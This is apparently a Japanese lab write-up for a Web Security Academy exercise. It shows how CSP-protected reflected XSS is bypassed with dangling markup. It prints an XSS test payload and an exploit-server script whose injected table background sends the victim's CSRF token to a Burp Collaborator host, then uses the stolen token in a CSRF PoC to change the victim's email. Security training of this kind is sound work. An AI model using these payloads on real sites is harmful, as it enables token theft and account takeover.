Hello there, ('ω')ノ
CSPで保護された反射型XSS、ぶら下がりマークアップ攻撃を。
このラボは、CSPを使用してXSS攻撃を軽減して。
CSRFトークンを盗んで、別ユーザのメールアドレスを変更する。
ダングリングマークアップ攻撃を実行せよと。
まずは、ログインして。
メールアドレスを変更して。
リクエストをリピータへ。
下記のペイロードを挿入して動作とCSPの確認を。
"><img src=x onerror=alert(1)>
Followして。
まずは、コラボレータを起動してURLをコピーして。
下記のスクリプトをエクスプロイトサーバへ。
<script>
location='https://ac1c1fe01ebe941f800b402000ea001e.web-security-academy.net/my-account?email=%22%3E%3Ctable%20background=%27//pohuavjwrcun1wulypj3mism4da4yt.burpcollaborator.net?';
</script>
Storeして、Viewでページを確認してからエクスプロイトサーバでDeliverを。
コラボレータでHTTPをキャッチしてcsrfをデコードへ。
下記のようにデコードして。
g4NZqAM51E3PljT20VEFM9DLRF4QNLgu
ターゲットユーザがラボのWebサイトにログインしたままで。
悪意のあるスクリプトを含むWebサイトにアクセスすると。
ブラウザは、CSRFトークンを含む要求を悪意のあるWebサイトに送信して。
その後、このトークンを盗むことができるので。
まずは、インターセプトをオンにしてからでメールアドレスの変更を。
右クリックでCSRF PoCを。
リクエストはDropしてからインターセプトをオフにしておいて。
Optionをチェックして。CSRFトークンを書き換えて。
確認のためにメールアドレスも変更しておいてからRegenerateを。
HTMLをコピーして。
コピーしたHTMLを貼り付けて、SaveしてDeliverすると。
クリアできた。
Best regards, (^^ゞ